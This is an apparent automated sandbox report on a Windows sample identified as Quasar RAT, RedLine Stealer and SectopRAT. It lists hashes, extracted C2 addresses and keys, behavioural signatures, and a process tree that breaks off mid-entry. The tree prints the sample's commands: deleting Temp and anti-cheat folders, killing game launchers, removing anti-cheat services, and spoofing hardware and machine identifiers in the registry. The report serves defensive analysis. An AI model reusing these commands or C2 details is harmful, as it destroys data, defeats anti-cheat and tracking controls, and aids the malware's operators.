Resubmissions

31/03/2025, 16:43 UTC

250331-t8m4kstwax 10

31/03/2025, 16:15 UTC

250331-tp8wyawls8 10

Analysis

  • max time kernel
    11s
  • max time network
    29s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31/03/2025, 16:43 UTC

General

  • Target

    3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe

  • Size

    3.6MB

  • MD5

    cf56adaf1236aa52a98723c8aa61ff84

  • SHA1

    00a517dfa5a9294f5619a7a1d8d0181966692768

  • SHA256

    3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88

  • SHA512

    2ef67cad31b4792fe066c2cd2f8a745493cf6bd1cab055e689ffa02bb8ec656746f28d06ae0dd6a4a88043c35ac7cf5cc18c3165e81959ef6b6d87ca12a9742b

  • SSDEEP

    98304:k5a7Zy+b1yCgWYdhz/tH3ILijJxeWB/5izLurIBQPZJCj:kKA+QWQhLF3ILqJx0zLuL2

Malware Config

Extracted

Family

quasar

Version

2.8.0.1

Botnet

Images.exe

C2

85.215.222.129:65535

Mutex

G8fgKgmsR7tqiTolCN

Attributes
  • encryption_key

    SLsfHXfM5GTIubFvF50I

  • install_name

    Images.exe

  • log_directory

    FiveM_Logs

  • reconnect_delay

    3000

  • startup_key

    Venom Client Startup

Extracted

Family

redline

Botnet

cheat

C2

85.215.222.129:43240

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 9 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 8 IoCs
  • Modifies registry key 1 TTPs 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
    C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe bcdedit /c set shutdown /r readonly /f force /t 2
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5416
    • C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe
      "C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Color 0b
        3⤵
          PID:5948
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
          3⤵
            PID:2420
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
            3⤵
              PID:4872
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              3⤵
                PID:5884
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1736
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im EpicGamesLauncher.exe
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3036
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3364
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im steam.exe
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:416
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
                3⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious use of WriteProcessMemory
                PID:3768
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im FortniteClient-Win64-Shipping.exe
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3484
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:540
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im OneDrive.exe
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5372
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                3⤵
                  PID:5612
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                  3⤵
                    PID:5188
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im EpicGamesLauncher.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5932
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                    3⤵
                      PID:5952
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im EpicGamesLauncher.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3208
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                      3⤵
                        PID:244
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im EpicGamesLauncher.exe
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4092
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                        3⤵
                          PID:5508
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                          3⤵
                            PID:4208
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im EpicGamesLauncher.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5100
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                            3⤵
                              PID:2484
                              • C:\Windows\system32\taskkill.exe
                                taskkill /f /im EpicGamesLauncher.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4488
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                              3⤵
                                PID:6040
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im EpicGamesLauncher.exe
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4144
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                                3⤵
                                  PID:5776
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im EpicGamesLauncher.exe
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2740
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
                                  3⤵
                                    PID:1860
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /f /im EpicGamesLauncher.exe
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1808
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
                                    3⤵
                                      PID:5364
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
                                        4⤵
                                        • Modifies registry key
                                        PID:1212
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
                                      3⤵
                                        PID:6120
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
                                          4⤵
                                          • Modifies registry key
                                          PID:5988
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
                                        3⤵
                                          PID:5196
                                          • C:\Windows\system32\reg.exe
                                            reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
                                            4⤵
                                              PID:5112
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
                                            3⤵
                                              PID:5616
                                              • C:\Windows\system32\reg.exe
                                                REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-30779 /f
                                                4⤵
                                                • Modifies registry key
                                                PID:3364
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
                                              3⤵
                                                PID:1720
                                                • C:\Windows\system32\reg.exe
                                                  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-30779 /f
                                                  4⤵
                                                    PID:3416
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
                                                  3⤵
                                                    PID:2980
                                                    • C:\Windows\system32\reg.exe
                                                      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple30779-30331-22548-8299 /f
                                                      4⤵
                                                      • Modifies registry key
                                                      PID:6020
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
                                                    3⤵
                                                      PID:3044
                                                      • C:\Windows\system32\reg.exe
                                                        REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-30779-%random} /f
                                                        4⤵
                                                        • Modifies registry key
                                                        PID:1164
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
                                                      3⤵
                                                        PID:1784
                                                        • C:\Windows\system32\reg.exe
                                                          REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-307793033122548 /f
                                                          4⤵
                                                          • Modifies registry key
                                                          PID:5840
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
                                                        3⤵
                                                          PID:2008
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
                                                          3⤵
                                                            PID:5204
                                                            • C:\Windows\system32\reg.exe
                                                              REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-30779 /f
                                                              4⤵
                                                              • Modifies registry key
                                                              PID:764
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
                                                            3⤵
                                                              PID:1752
                                                              • C:\Windows\system32\reg.exe
                                                                REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-307793033122548 /f
                                                                4⤵
                                                                • Enumerates system info in registry
                                                                PID:2796
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
                                                              3⤵
                                                                PID:1508
                                                                • C:\Windows\system32\reg.exe
                                                                  REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-30779-30331-225488299} /f
                                                                  4⤵
                                                                  • Modifies registry key
                                                                  PID:2140
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
                                                                3⤵
                                                                  PID:1644
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
                                                                  3⤵
                                                                    PID:804
                                                                    • C:\Windows\system32\reg.exe
                                                                      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-30779-30331-225488299} /f
                                                                      4⤵
                                                                      • Modifies registry key
                                                                      PID:1940
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                    3⤵
                                                                      PID:6096
                                                                      • C:\Windows\system32\reg.exe
                                                                        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                        4⤵
                                                                        • Modifies registry key
                                                                        PID:3520
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                      3⤵
                                                                        PID:1204
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                          4⤵
                                                                            PID:1092
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                          3⤵
                                                                            PID:5544
                                                                            • C:\Windows\system32\reg.exe
                                                                              REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                              4⤵
                                                                              • Modifies registry key
                                                                              PID:5492
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                            3⤵
                                                                              PID:5220
                                                                              • C:\Windows\system32\reg.exe
                                                                                REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:32
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                              3⤵
                                                                                PID:3176
                                                                                • C:\Windows\system32\reg.exe
                                                                                  REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:5316
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                3⤵
                                                                                  PID:3276
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                                    4⤵
                                                                                    • Enumerates system info in registry
                                                                                    • Modifies registry key
                                                                                    PID:2700
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
                                                                                  3⤵
                                                                                    PID:112
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-30782-8312-764432362 /f
                                                                                      4⤵
                                                                                      • Enumerates system info in registry
                                                                                      PID:760
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
                                                                                    3⤵
                                                                                      PID:2004
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-30782-8312-764432362} /f
                                                                                        4⤵
                                                                                          PID:2940
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
                                                                                        3⤵
                                                                                          PID:3576
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-30782-8312-764432362} /f
                                                                                            4⤵
                                                                                            • Modifies registry key
                                                                                            PID:5076
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
                                                                                          3⤵
                                                                                            PID:5736
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-30782 /f
                                                                                              4⤵
                                                                                              • Modifies registry key
                                                                                              PID:876
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
                                                                                            3⤵
                                                                                              PID:240
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 30782 /f
                                                                                                4⤵
                                                                                                • Modifies registry key
                                                                                                PID:4088
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
                                                                                              3⤵
                                                                                                PID:4788
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 30782 /f
                                                                                                  4⤵
                                                                                                  • Modifies registry key
                                                                                                  PID:3232
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
                                                                                                3⤵
                                                                                                  PID:1532
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-30782 /f
                                                                                                    4⤵
                                                                                                    • Modifies registry key
                                                                                                    PID:1604
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&1
                                                                                                  3⤵
                                                                                                    PID:5288
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
                                                                                                    3⤵
                                                                                                      PID:2088
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple30782-8312-7644-3236225025} /f
                                                                                                        4⤵
                                                                                                        • Modifies registry key
                                                                                                        PID:3620
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
                                                                                                      3⤵
                                                                                                        PID:1116
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
                                                                                                        3⤵
                                                                                                          PID:1928
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 30782 /f
                                                                                                            4⤵
                                                                                                              PID:412
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
                                                                                                            3⤵
                                                                                                              PID:4160
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
                                                                                                              3⤵
                                                                                                                PID:4540
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 30782-8312-7644-32362 /f
                                                                                                                  4⤵
                                                                                                                  • Modifies registry key
                                                                                                                  PID:488
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
                                                                                                                3⤵
                                                                                                                  PID:1536
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple30782-8312-7644-32362 /f
                                                                                                                    4⤵
                                                                                                                    • Modifies registry key
                                                                                                                    PID:4168
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f
                                                                                                                  3⤵
                                                                                                                    PID:5584
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple30782 /f
                                                                                                                      4⤵
                                                                                                                      • Modifies registry key
                                                                                                                      PID:2372
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
                                                                                                                    3⤵
                                                                                                                      PID:5508
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
                                                                                                                      3⤵
                                                                                                                        PID:4628
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 30782 /f
                                                                                                                          4⤵
                                                                                                                          • Modifies registry key
                                                                                                                          PID:576
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f
                                                                                                                        3⤵
                                                                                                                          PID:4156
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple30785-19060-25508-23657} /f
                                                                                                                            4⤵
                                                                                                                            • Modifies registry key
                                                                                                                            PID:3032
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
                                                                                                                          3⤵
                                                                                                                            PID:5216
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              REG delete HKCU\Software\Epic" "Games /f
                                                                                                                              4⤵
                                                                                                                                PID:1516
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f
                                                                                                                              3⤵
                                                                                                                                PID:3408
                                                                                                                              • C:\Windows\system32\cmd.exe
